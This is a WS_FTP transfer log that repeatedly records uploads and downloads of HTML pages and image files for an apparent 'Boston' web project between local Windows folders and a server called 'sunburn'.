10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:47 B C:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:47 B C:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:47 B C:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:47 B C:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:47 B C:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:47 B C:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:47 B C:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:47 B C:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:47 B C:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:47 B C:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:47 B C:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:47 B C:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
